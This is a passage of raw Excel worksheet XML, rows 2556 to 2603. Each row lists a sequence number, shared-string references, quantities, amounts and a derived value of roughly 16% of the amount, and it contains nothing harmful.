      <c r="E2556" s="238" t="s">
        <v>11856</v>
      </c>
      <c r="F2556" s="238" t="s">
        <v>11857</v>
      </c>
      <c r="G2556" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2556" s="10">
        <v>290</v>
      </c>
      <c r="I2556" s="14">
        <v>991.2</v>
      </c>
      <c r="J2556" s="15">
        <v>158.688</v>
      </c>
      <c r="K2556" s="16"/>
    </row>
    <row r="2557" spans="2:11">
      <c r="B2557" s="9">
        <v>2591</v>
      </c>
      <c r="C2557" s="238" t="s">
        <v>11858</v>
      </c>
      <c r="D2557" s="238" t="s">
        <v>11859</v>
      </c>
      <c r="E2557" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2557" s="238" t="s">
        <v>11849</v>
      </c>
      <c r="G2557" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2557" s="10">
        <v>8</v>
      </c>
      <c r="I2557" s="14">
        <v>390.36</v>
      </c>
      <c r="J2557" s="15">
        <v>62.464</v>
      </c>
      <c r="K2557" s="16"/>
    </row>
    <row r="2558" spans="2:11">
      <c r="B2558" s="9">
        <v>2592</v>
      </c>
      <c r="C2558" s="238" t="s">
        <v>11860</v>
      </c>
      <c r="D2558" s="238" t="s">
        <v>11861</v>
      </c>
      <c r="E2558" s="238" t="s">
        <v>11077</v>
      </c>
      <c r="F2558" s="238" t="s">
        <v>11862</v>
      </c>
      <c r="G2558" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2558" s="10">
        <v>35</v>
      </c>
      <c r="I2558" s="14">
        <v>659.72</v>
      </c>
      <c r="J2558" s="15">
        <v>105.56</v>
      </c>
      <c r="K2558" s="16"/>
    </row>
    <row r="2559" spans="2:11">
      <c r="B2559" s="9">
        <v>2593</v>
      </c>
      <c r="C2559" s="238" t="s">
        <v>11863</v>
      </c>
      <c r="D2559" s="238" t="s">
        <v>11864</v>
      </c>
      <c r="E2559" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F2559" s="238" t="s">
        <v>11865</v>
      </c>
      <c r="G2559" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2559" s="10">
        <v>20</v>
      </c>
      <c r="I2559" s="14">
        <v>717.95</v>
      </c>
      <c r="J2559" s="15">
        <v>114.88</v>
      </c>
      <c r="K2559" s="16"/>
    </row>
    <row r="2560" spans="2:11">
      <c r="B2560" s="9">
        <v>2594</v>
      </c>
      <c r="C2560" s="238" t="s">
        <v>11866</v>
      </c>
      <c r="D2560" s="238" t="s">
        <v>7226</v>
      </c>
      <c r="E2560" s="238" t="s">
        <v>7227</v>
      </c>
      <c r="F2560" s="238" t="s">
        <v>11867</v>
      </c>
      <c r="G2560" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2560" s="10">
        <v>18</v>
      </c>
      <c r="I2560" s="14">
        <v>261.54</v>
      </c>
      <c r="J2560" s="15">
        <v>41.8464</v>
      </c>
      <c r="K2560" s="16"/>
    </row>
    <row r="2561" spans="2:11">
      <c r="B2561" s="9">
        <v>2595</v>
      </c>
      <c r="C2561" s="238" t="s">
        <v>11868</v>
      </c>
      <c r="D2561" s="238" t="s">
        <v>11869</v>
      </c>
      <c r="E2561" s="238" t="s">
        <v>11870</v>
      </c>
      <c r="F2561" s="238" t="s">
        <v>11871</v>
      </c>
      <c r="G2561" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2561" s="10">
        <v>15</v>
      </c>
      <c r="I2561" s="14">
        <v>194.58</v>
      </c>
      <c r="J2561" s="15">
        <v>31.128</v>
      </c>
      <c r="K2561" s="16"/>
    </row>
    <row r="2562" spans="2:11">
      <c r="B2562" s="9">
        <v>2596</v>
      </c>
      <c r="C2562" s="238" t="s">
        <v>11872</v>
      </c>
      <c r="D2562" s="238" t="s">
        <v>11873</v>
      </c>
      <c r="E2562" s="238" t="s">
        <v>11582</v>
      </c>
      <c r="F2562" s="238" t="s">
        <v>11862</v>
      </c>
      <c r="G2562" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2562" s="10">
        <v>188</v>
      </c>
      <c r="I2562" s="14">
        <v>657.36</v>
      </c>
      <c r="J2562" s="15">
        <v>105.28</v>
      </c>
      <c r="K2562" s="16"/>
    </row>
    <row r="2563" spans="2:11">
      <c r="B2563" s="9">
        <v>2597</v>
      </c>
      <c r="C2563" s="238" t="s">
        <v>11874</v>
      </c>
      <c r="D2563" s="238" t="s">
        <v>11875</v>
      </c>
      <c r="E2563" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2563" s="238" t="s">
        <v>11876</v>
      </c>
      <c r="G2563" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2563" s="10">
        <v>12</v>
      </c>
      <c r="I2563" s="14">
        <v>825.35</v>
      </c>
      <c r="J2563" s="15">
        <v>132.0576</v>
      </c>
      <c r="K2563" s="16"/>
    </row>
    <row r="2564" spans="2:11">
      <c r="B2564" s="9">
        <v>2598</v>
      </c>
      <c r="C2564" s="238" t="s">
        <v>11877</v>
      </c>
      <c r="D2564" s="238" t="s">
        <v>11878</v>
      </c>
      <c r="E2564" s="238" t="s">
        <v>11879</v>
      </c>
      <c r="F2564" s="9"/>
      <c r="G2564" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2564" s="10">
        <v>164</v>
      </c>
      <c r="I2564" s="14">
        <v>333.55</v>
      </c>
      <c r="J2564" s="15">
        <v>53.2672</v>
      </c>
      <c r="K2564" s="16"/>
    </row>
    <row r="2565" spans="2:11">
      <c r="B2565" s="9">
        <v>2599</v>
      </c>
      <c r="C2565" s="238" t="s">
        <v>11880</v>
      </c>
      <c r="D2565" s="238" t="s">
        <v>11881</v>
      </c>
      <c r="E2565" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F2565" s="238" t="s">
        <v>11882</v>
      </c>
      <c r="G2565" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2565" s="10">
        <v>2</v>
      </c>
      <c r="I2565" s="14">
        <v>4307.68</v>
      </c>
      <c r="J2565" s="15">
        <v>689.2288</v>
      </c>
      <c r="K2565" s="16"/>
    </row>
    <row r="2566" spans="2:11">
      <c r="B2566" s="9">
        <v>2600</v>
      </c>
      <c r="C2566" s="238" t="s">
        <v>11883</v>
      </c>
      <c r="D2566" s="238" t="s">
        <v>11884</v>
      </c>
      <c r="E2566" s="238" t="s">
        <v>4942</v>
      </c>
      <c r="F2566" s="238" t="s">
        <v>11885</v>
      </c>
      <c r="G2566" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2566" s="10">
        <v>2</v>
      </c>
      <c r="I2566" s="14">
        <v>41.02</v>
      </c>
      <c r="J2566" s="15">
        <v>6.5632</v>
      </c>
      <c r="K2566" s="16"/>
    </row>
    <row r="2567" spans="2:11">
      <c r="B2567" s="9">
        <v>2601</v>
      </c>
      <c r="C2567" s="238" t="s">
        <v>11886</v>
      </c>
      <c r="D2567" s="238" t="s">
        <v>11887</v>
      </c>
      <c r="E2567" s="238" t="s">
        <v>7316</v>
      </c>
      <c r="F2567" s="238" t="s">
        <v>11888</v>
      </c>
      <c r="G2567" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2567" s="10">
        <v>2</v>
      </c>
      <c r="I2567" s="14">
        <v>116.8</v>
      </c>
      <c r="J2567" s="15">
        <v>18.688</v>
      </c>
      <c r="K2567" s="16"/>
    </row>
    <row r="2568" spans="2:11">
      <c r="B2568" s="9">
        <v>2602</v>
      </c>
      <c r="C2568" s="238" t="s">
        <v>11889</v>
      </c>
      <c r="D2568" s="238" t="s">
        <v>11890</v>
      </c>
      <c r="E2568" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2568" s="238" t="s">
        <v>7809</v>
      </c>
      <c r="G2568" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2568" s="10">
        <v>1</v>
      </c>
      <c r="I2568" s="14">
        <v>1.2</v>
      </c>
      <c r="J2568" s="15">
        <v>0.192</v>
      </c>
      <c r="K2568" s="16"/>
    </row>
    <row r="2569" spans="2:11">
      <c r="B2569" s="9">
        <v>2603</v>
      </c>
      <c r="C2569" s="238" t="s">
        <v>11891</v>
      </c>
      <c r="D2569" s="238" t="s">
        <v>11892</v>
      </c>
      <c r="E2569" s="238" t="s">
        <v>11337</v>
      </c>
      <c r="F2569" s="238" t="s">
        <v>11893</v>
      </c>
      <c r="G2569" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2569" s="10">
        <v>6</v>
      </c>
      <c r="I2569" s="14">
        <v>897.44</v>
      </c>
      <c r="J2569" s="15">
        <v>358.968</v>
      </c>
      <c r="K2569" s="16"/>
    </row>
    <row r="2570" spans="2:11">
      <c r="B2570" s="9">
        <v>2604</v>
      </c>
      <c r="C2570" s="238" t="s">
        <v>11894</v>
      </c>
      <c r="D2570" s="238" t="s">
        <v>11895</v>
      </c>
      <c r="E2570" s="238" t="s">
        <v>6204</v>
      </c>
      <c r="F2570" s="238" t="s">
        <v>11896</v>
      </c>
      <c r="G2570" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2570" s="10">
        <v>1</v>
      </c>
      <c r="I2570" s="14">
        <v>131.9</v>
      </c>
      <c r="J2570" s="15">
        <v>21.104</v>
      </c>
      <c r="K2570" s="16"/>
    </row>
    <row r="2571" spans="2:11">
      <c r="B2571" s="9">
        <v>2605</v>
      </c>
      <c r="C2571" s="238" t="s">
        <v>11897</v>
      </c>
      <c r="D2571" s="238" t="s">
        <v>11898</v>
      </c>
      <c r="E2571" s="238" t="s">
        <v>11899</v>
      </c>
      <c r="F2571" s="238" t="s">
        <v>10944</v>
      </c>
      <c r="G2571" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2571" s="10">
        <v>4</v>
      </c>
      <c r="I2571" s="14">
        <v>361.6</v>
      </c>
      <c r="J2571" s="15">
        <v>57.856</v>
      </c>
      <c r="K2571" s="16"/>
    </row>
    <row r="2572" spans="2:11">
      <c r="B2572" s="9">
        <v>2606</v>
      </c>
      <c r="C2572" s="238" t="s">
        <v>11900</v>
      </c>
      <c r="D2572" s="238" t="s">
        <v>11901</v>
      </c>
      <c r="E2572" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F2572" s="238" t="s">
        <v>11902</v>
      </c>
      <c r="G2572" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2572" s="10">
        <v>3</v>
      </c>
      <c r="I2572" s="14">
        <v>938.38</v>
      </c>
      <c r="J2572" s="15">
        <v>250.232</v>
      </c>
      <c r="K2572" s="16"/>
    </row>
    <row r="2573" spans="2:11">
      <c r="B2573" s="9">
        <v>2607</v>
      </c>
      <c r="C2573" s="238" t="s">
        <v>11903</v>
      </c>
      <c r="D2573" s="238" t="s">
        <v>11904</v>
      </c>
      <c r="E2573" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2573" s="238" t="s">
        <v>11905</v>
      </c>
      <c r="G2573" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2573" s="10">
        <v>11</v>
      </c>
      <c r="I2573" s="14">
        <v>461.66</v>
      </c>
      <c r="J2573" s="15">
        <v>73.8672</v>
      </c>
      <c r="K2573" s="16"/>
    </row>
    <row r="2574" spans="2:11">
      <c r="B2574" s="9">
        <v>2608</v>
      </c>
      <c r="C2574" s="238" t="s">
        <v>11906</v>
      </c>
      <c r="D2574" s="238" t="s">
        <v>11907</v>
      </c>
      <c r="E2574" s="238" t="s">
        <v>11908</v>
      </c>
      <c r="F2574" s="238" t="s">
        <v>11909</v>
      </c>
      <c r="G2574" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2574" s="10">
        <v>8</v>
      </c>
      <c r="I2574" s="14">
        <v>396.8</v>
      </c>
      <c r="J2574" s="15">
        <v>63.488</v>
      </c>
      <c r="K2574" s="16"/>
    </row>
    <row r="2575" spans="2:11">
      <c r="B2575" s="9">
        <v>2609</v>
      </c>
      <c r="C2575" s="238" t="s">
        <v>11910</v>
      </c>
      <c r="D2575" s="238" t="s">
        <v>11911</v>
      </c>
      <c r="E2575" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2575" s="238" t="s">
        <v>11912</v>
      </c>
      <c r="G2575" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2575" s="10">
        <v>8</v>
      </c>
      <c r="I2575" s="14">
        <v>172.8</v>
      </c>
      <c r="J2575" s="15">
        <v>69.12</v>
      </c>
      <c r="K2575" s="16"/>
    </row>
    <row r="2576" spans="2:11">
      <c r="B2576" s="9">
        <v>2610</v>
      </c>
      <c r="C2576" s="238" t="s">
        <v>11913</v>
      </c>
      <c r="D2576" s="238" t="s">
        <v>11914</v>
      </c>
      <c r="E2576" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2576" s="238" t="s">
        <v>11915</v>
      </c>
      <c r="G2576" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2576" s="10">
        <v>3</v>
      </c>
      <c r="I2576" s="14">
        <v>336</v>
      </c>
      <c r="J2576" s="15">
        <v>53.76</v>
      </c>
      <c r="K2576" s="16"/>
    </row>
    <row r="2577" spans="2:11">
      <c r="B2577" s="9">
        <v>2611</v>
      </c>
      <c r="C2577" s="238" t="s">
        <v>11916</v>
      </c>
      <c r="D2577" s="238" t="s">
        <v>11917</v>
      </c>
      <c r="E2577" s="238" t="s">
        <v>11918</v>
      </c>
      <c r="F2577" s="238" t="s">
        <v>11919</v>
      </c>
      <c r="G2577" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2577" s="10">
        <v>1</v>
      </c>
      <c r="I2577" s="14">
        <v>341.88</v>
      </c>
      <c r="J2577" s="15">
        <v>54.7008</v>
      </c>
      <c r="K2577" s="16"/>
    </row>
    <row r="2578" spans="2:11">
      <c r="B2578" s="9">
        <v>2612</v>
      </c>
      <c r="C2578" s="238" t="s">
        <v>11920</v>
      </c>
      <c r="D2578" s="238" t="s">
        <v>11921</v>
      </c>
      <c r="E2578" s="238" t="s">
        <v>11186</v>
      </c>
      <c r="F2578" s="238" t="s">
        <v>11922</v>
      </c>
      <c r="G2578" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2578" s="10">
        <v>4</v>
      </c>
      <c r="I2578" s="14">
        <v>96</v>
      </c>
      <c r="J2578" s="15">
        <v>15.36</v>
      </c>
      <c r="K2578" s="16"/>
    </row>
    <row r="2579" spans="2:11">
      <c r="B2579" s="9">
        <v>2613</v>
      </c>
      <c r="C2579" s="238" t="s">
        <v>11923</v>
      </c>
      <c r="D2579" s="238" t="s">
        <v>11924</v>
      </c>
      <c r="E2579" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F2579" s="238" t="s">
        <v>11925</v>
      </c>
      <c r="G2579" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2579" s="10">
        <v>5</v>
      </c>
      <c r="I2579" s="14">
        <v>511.72</v>
      </c>
      <c r="J2579" s="15">
        <v>81.872</v>
      </c>
      <c r="K2579" s="16"/>
    </row>
    <row r="2580" spans="2:11">
      <c r="B2580" s="9">
        <v>2614</v>
      </c>
      <c r="C2580" s="238" t="s">
        <v>11926</v>
      </c>
      <c r="D2580" s="238" t="s">
        <v>11927</v>
      </c>
      <c r="E2580" s="238" t="s">
        <v>11928</v>
      </c>
      <c r="F2580" s="238" t="s">
        <v>11929</v>
      </c>
      <c r="G2580" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2580" s="10">
        <v>3</v>
      </c>
      <c r="I2580" s="14">
        <v>4191.46</v>
      </c>
      <c r="J2580" s="15">
        <v>670.632</v>
      </c>
      <c r="K2580" s="16"/>
    </row>
    <row r="2581" spans="2:11">
      <c r="B2581" s="9">
        <v>2615</v>
      </c>
      <c r="C2581" s="238" t="s">
        <v>11930</v>
      </c>
      <c r="D2581" s="238" t="s">
        <v>11931</v>
      </c>
      <c r="E2581" s="238" t="s">
        <v>8445</v>
      </c>
      <c r="F2581" s="238" t="s">
        <v>11932</v>
      </c>
      <c r="G2581" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2581" s="10">
        <v>1</v>
      </c>
      <c r="I2581" s="14">
        <v>240</v>
      </c>
      <c r="J2581" s="15">
        <v>38.4</v>
      </c>
      <c r="K2581" s="16"/>
    </row>
    <row r="2582" spans="2:11">
      <c r="B2582" s="9">
        <v>2616</v>
      </c>
      <c r="C2582" s="238" t="s">
        <v>11933</v>
      </c>
      <c r="D2582" s="238" t="s">
        <v>11934</v>
      </c>
      <c r="E2582" s="238" t="s">
        <v>8445</v>
      </c>
      <c r="F2582" s="238" t="s">
        <v>11935</v>
      </c>
      <c r="G2582" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2582" s="10">
        <v>1</v>
      </c>
      <c r="I2582" s="14">
        <v>200</v>
      </c>
      <c r="J2582" s="15">
        <v>32</v>
      </c>
      <c r="K2582" s="16"/>
    </row>
    <row r="2583" spans="2:11">
      <c r="B2583" s="9">
        <v>2617</v>
      </c>
      <c r="C2583" s="238" t="s">
        <v>11936</v>
      </c>
      <c r="D2583" s="238" t="s">
        <v>11937</v>
      </c>
      <c r="E2583" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F2583" s="238" t="s">
        <v>11938</v>
      </c>
      <c r="G2583" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2583" s="10">
        <v>4</v>
      </c>
      <c r="I2583" s="14">
        <v>4004.66</v>
      </c>
      <c r="J2583" s="15">
        <v>640.7488</v>
      </c>
      <c r="K2583" s="16"/>
    </row>
    <row r="2584" spans="2:11">
      <c r="B2584" s="9">
        <v>2618</v>
      </c>
      <c r="C2584" s="238" t="s">
        <v>11939</v>
      </c>
      <c r="D2584" s="238" t="s">
        <v>9332</v>
      </c>
      <c r="E2584" s="238" t="s">
        <v>7995</v>
      </c>
      <c r="F2584" s="238" t="s">
        <v>11940</v>
      </c>
      <c r="G2584" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2584" s="10">
        <v>1</v>
      </c>
      <c r="I2584" s="14">
        <v>641.02</v>
      </c>
      <c r="J2584" s="15">
        <v>102.5632</v>
      </c>
      <c r="K2584" s="16"/>
    </row>
    <row r="2585" spans="2:11">
      <c r="B2585" s="9">
        <v>2619</v>
      </c>
      <c r="C2585" s="238" t="s">
        <v>11941</v>
      </c>
      <c r="D2585" s="238" t="s">
        <v>11942</v>
      </c>
      <c r="E2585" s="238" t="s">
        <v>11943</v>
      </c>
      <c r="F2585" s="238" t="s">
        <v>11944</v>
      </c>
      <c r="G2585" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2585" s="10">
        <v>1</v>
      </c>
      <c r="I2585" s="14">
        <v>594.87</v>
      </c>
      <c r="J2585" s="15">
        <v>95.1792</v>
      </c>
      <c r="K2585" s="16"/>
    </row>
    <row r="2586" spans="2:11">
      <c r="B2586" s="9">
        <v>2620</v>
      </c>
      <c r="C2586" s="238" t="s">
        <v>11945</v>
      </c>
      <c r="D2586" s="238" t="s">
        <v>11946</v>
      </c>
      <c r="E2586" s="238" t="s">
        <v>11947</v>
      </c>
      <c r="F2586" s="238" t="s">
        <v>11948</v>
      </c>
      <c r="G2586" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2586" s="10">
        <v>2</v>
      </c>
      <c r="I2586" s="14">
        <v>8079.8</v>
      </c>
      <c r="J2586" s="15">
        <v>1292.768</v>
      </c>
      <c r="K2586" s="16"/>
    </row>
    <row r="2587" spans="2:11">
      <c r="B2587" s="9">
        <v>2621</v>
      </c>
      <c r="C2587" s="238" t="s">
        <v>11949</v>
      </c>
      <c r="D2587" s="238" t="s">
        <v>11950</v>
      </c>
      <c r="E2587" s="238" t="s">
        <v>11951</v>
      </c>
      <c r="F2587" s="238" t="s">
        <v>11952</v>
      </c>
      <c r="G2587" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2587" s="10">
        <v>3</v>
      </c>
      <c r="I2587" s="14">
        <v>63</v>
      </c>
      <c r="J2587" s="15">
        <v>10.08</v>
      </c>
      <c r="K2587" s="16"/>
    </row>
    <row r="2588" spans="2:11">
      <c r="B2588" s="9">
        <v>2622</v>
      </c>
      <c r="C2588" s="238" t="s">
        <v>11953</v>
      </c>
      <c r="D2588" s="238" t="s">
        <v>11954</v>
      </c>
      <c r="E2588" s="238" t="s">
        <v>5146</v>
      </c>
      <c r="F2588" s="238" t="s">
        <v>11955</v>
      </c>
      <c r="G2588" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2588" s="10">
        <v>2</v>
      </c>
      <c r="I2588" s="14">
        <v>152</v>
      </c>
      <c r="J2588" s="15">
        <v>24.32</v>
      </c>
      <c r="K2588" s="16"/>
    </row>
    <row r="2589" spans="2:11">
      <c r="B2589" s="9">
        <v>2623</v>
      </c>
      <c r="C2589" s="238" t="s">
        <v>11956</v>
      </c>
      <c r="D2589" s="238" t="s">
        <v>11957</v>
      </c>
      <c r="E2589" s="238" t="s">
        <v>7796</v>
      </c>
      <c r="F2589" s="238" t="s">
        <v>11849</v>
      </c>
      <c r="G2589" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2589" s="10">
        <v>3</v>
      </c>
      <c r="I2589" s="14">
        <v>52.81</v>
      </c>
      <c r="J2589" s="15">
        <v>8.448</v>
      </c>
      <c r="K2589" s="16"/>
    </row>
    <row r="2590" spans="2:11">
      <c r="B2590" s="9">
        <v>2624</v>
      </c>
      <c r="C2590" s="238" t="s">
        <v>11958</v>
      </c>
      <c r="D2590" s="238" t="s">
        <v>11959</v>
      </c>
      <c r="E2590" s="238" t="s">
        <v>4750</v>
      </c>
      <c r="F2590" s="238" t="s">
        <v>11960</v>
      </c>
      <c r="G2590" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2590" s="10">
        <v>6</v>
      </c>
      <c r="I2590" s="14">
        <v>170</v>
      </c>
      <c r="J2590" s="15">
        <v>27.1968</v>
      </c>
      <c r="K2590" s="16"/>
    </row>
    <row r="2591" spans="2:11">
      <c r="B2591" s="9">
        <v>2625</v>
      </c>
      <c r="C2591" s="238" t="s">
        <v>11961</v>
      </c>
      <c r="D2591" s="238" t="s">
        <v>11962</v>
      </c>
      <c r="E2591" s="238" t="s">
        <v>11963</v>
      </c>
      <c r="F2591" s="238" t="s">
        <v>11964</v>
      </c>
      <c r="G2591" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2591" s="10">
        <v>6</v>
      </c>
      <c r="I2591" s="14">
        <v>1465</v>
      </c>
      <c r="J2591" s="15">
        <v>234.4032</v>
      </c>
      <c r="K2591" s="16"/>
    </row>
    <row r="2592" spans="2:11">
      <c r="B2592" s="9">
        <v>2626</v>
      </c>
      <c r="C2592" s="238" t="s">
        <v>11965</v>
      </c>
      <c r="D2592" s="238" t="s">
        <v>11966</v>
      </c>
      <c r="E2592" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2592" s="238" t="s">
        <v>11967</v>
      </c>
      <c r="G2592" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2592" s="10">
        <v>64</v>
      </c>
      <c r="I2592" s="14">
        <v>112.27</v>
      </c>
      <c r="J2592" s="15">
        <v>17.92</v>
      </c>
      <c r="K2592" s="16"/>
    </row>
    <row r="2593" spans="2:11">
      <c r="B2593" s="9">
        <v>2627</v>
      </c>
      <c r="C2593" s="238" t="s">
        <v>11968</v>
      </c>
      <c r="D2593" s="238" t="s">
        <v>11969</v>
      </c>
      <c r="E2593" s="238" t="s">
        <v>4597</v>
      </c>
      <c r="F2593" s="238" t="s">
        <v>11970</v>
      </c>
      <c r="G2593" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2593" s="10">
        <v>2</v>
      </c>
      <c r="I2593" s="14">
        <v>5111.11</v>
      </c>
      <c r="J2593" s="15">
        <v>817.7792</v>
      </c>
      <c r="K2593" s="16"/>
    </row>
    <row r="2594" spans="2:11">
      <c r="B2594" s="9">
        <v>2628</v>
      </c>
      <c r="C2594" s="238" t="s">
        <v>11971</v>
      </c>
      <c r="D2594" s="238" t="s">
        <v>11972</v>
      </c>
      <c r="E2594" s="238" t="s">
        <v>10889</v>
      </c>
      <c r="F2594" s="238" t="s">
        <v>11862</v>
      </c>
      <c r="G2594" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2594" s="10">
        <v>5</v>
      </c>
      <c r="I2594" s="14">
        <v>88.77</v>
      </c>
      <c r="J2594" s="15">
        <v>14.2</v>
      </c>
      <c r="K2594" s="16"/>
    </row>
    <row r="2595" spans="2:11">
      <c r="B2595" s="9">
        <v>2629</v>
      </c>
      <c r="C2595" s="238" t="s">
        <v>11973</v>
      </c>
      <c r="D2595" s="238" t="s">
        <v>11974</v>
      </c>
      <c r="E2595" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F2595" s="238" t="s">
        <v>11975</v>
      </c>
      <c r="G2595" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2595" s="10">
        <v>5</v>
      </c>
      <c r="I2595" s="14">
        <v>28.78</v>
      </c>
      <c r="J2595" s="15">
        <v>4.608</v>
      </c>
      <c r="K2595" s="16"/>
    </row>
    <row r="2596" spans="2:11">
      <c r="B2596" s="9">
        <v>2630</v>
      </c>
      <c r="C2596" s="238" t="s">
        <v>11976</v>
      </c>
      <c r="D2596" s="238" t="s">
        <v>11977</v>
      </c>
      <c r="E2596" s="238" t="s">
        <v>10557</v>
      </c>
      <c r="F2596" s="238" t="s">
        <v>11978</v>
      </c>
      <c r="G2596" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2596" s="10">
        <v>13</v>
      </c>
      <c r="I2596" s="14">
        <v>111.74</v>
      </c>
      <c r="J2596" s="15">
        <v>17.888</v>
      </c>
      <c r="K2596" s="16"/>
    </row>
    <row r="2597" spans="2:11">
      <c r="B2597" s="9">
        <v>2631</v>
      </c>
      <c r="C2597" s="238" t="s">
        <v>11979</v>
      </c>
      <c r="D2597" s="238" t="s">
        <v>11980</v>
      </c>
      <c r="E2597" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2597" s="238" t="s">
        <v>11981</v>
      </c>
      <c r="G2597" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2597" s="10">
        <v>11</v>
      </c>
      <c r="I2597" s="14">
        <v>285.6</v>
      </c>
      <c r="J2597" s="15">
        <v>45.6896</v>
      </c>
      <c r="K2597" s="16"/>
    </row>
    <row r="2598" spans="2:11">
      <c r="B2598" s="9">
        <v>2632</v>
      </c>
      <c r="C2598" s="238" t="s">
        <v>11982</v>
      </c>
      <c r="D2598" s="238" t="s">
        <v>11983</v>
      </c>
      <c r="E2598" s="238" t="s">
        <v>11984</v>
      </c>
      <c r="F2598" s="238" t="s">
        <v>11985</v>
      </c>
      <c r="G2598" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2598" s="10">
        <v>22</v>
      </c>
      <c r="I2598" s="14">
        <v>9.23</v>
      </c>
      <c r="J2598" s="15">
        <v>1.4784</v>
      </c>
      <c r="K2598" s="16"/>
    </row>
    <row r="2599" spans="2:11">
      <c r="B2599" s="9">
        <v>2633</v>
      </c>
      <c r="C2599" s="238" t="s">
        <v>11986</v>
      </c>
      <c r="D2599" s="238" t="s">
        <v>11987</v>
      </c>
      <c r="E2599" s="238" t="s">
        <v>7696</v>
      </c>
      <c r="F2599" s="238" t="s">
        <v>11988</v>
      </c>
      <c r="G2599" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2599" s="10">
        <v>2</v>
      </c>
      <c r="I2599" s="14">
        <v>160</v>
      </c>
      <c r="J2599" s="15">
        <v>25.6</v>
      </c>
      <c r="K2599" s="16"/>
    </row>
    <row r="2600" spans="2:11">
      <c r="B2600" s="9">
        <v>2634</v>
      </c>
      <c r="C2600" s="238" t="s">
        <v>11989</v>
      </c>
      <c r="D2600" s="238" t="s">
        <v>11990</v>
      </c>
      <c r="E2600" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2600" s="238" t="s">
        <v>11991</v>
      </c>
      <c r="G2600" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2600" s="10">
        <v>1</v>
      </c>
      <c r="I2600" s="14">
        <v>6</v>
      </c>
      <c r="J2600" s="15">
        <v>0.96</v>
      </c>
      <c r="K2600" s="16"/>
    </row>
    <row r="2601" spans="2:11">
      <c r="B2601" s="9">
        <v>2635</v>
      </c>
      <c r="C2601" s="238" t="s">
        <v>11992</v>
      </c>
      <c r="D2601" s="238" t="s">
        <v>11993</v>
      </c>
      <c r="E2601" s="238" t="s">
        <v>11782</v>
      </c>
      <c r="F2601" s="238" t="s">
        <v>11994</v>
      </c>
      <c r="G2601" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2601" s="10">
        <v>2</v>
      </c>
      <c r="I2601" s="14">
        <v>190</v>
      </c>
      <c r="J2601" s="15">
        <v>30.4</v>
      </c>
      <c r="K2601" s="16"/>
    </row>
    <row r="2602" spans="2:11">
      <c r="B2602" s="9">
        <v>2636</v>
      </c>
      <c r="C2602" s="238" t="s">
        <v>11995</v>
      </c>
      <c r="D2602" s="238" t="s">
        <v>11996</v>
      </c>
      <c r="E2602" s="238" t="s">
        <v>11997</v>
      </c>
      <c r="F2602" s="238" t="s">
        <v>11998</v>
      </c>
      <c r="G2602" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2602" s="10">
        <v>2</v>
      </c>
      <c r="I2602" s="14">
        <v>1868.62</v>
      </c>
      <c r="J2602" s="15">
        <v>298.9792</v>
      </c>
      <c r="K2602" s="16"/>
    </row>
    <row r="2603" spans="2:11">
      <c r="B2603" s="9">
        <v>2637</v>
      </c>
      <c r="C2603" s="238" t="s">
        <v>11999</v>
      </c>
      <c r="D2603" s="238" t="s">
        <v>12000</v>
      </c>
      <c r="E2603" s="238" t="s">
        <v>12001</v>
      </c>
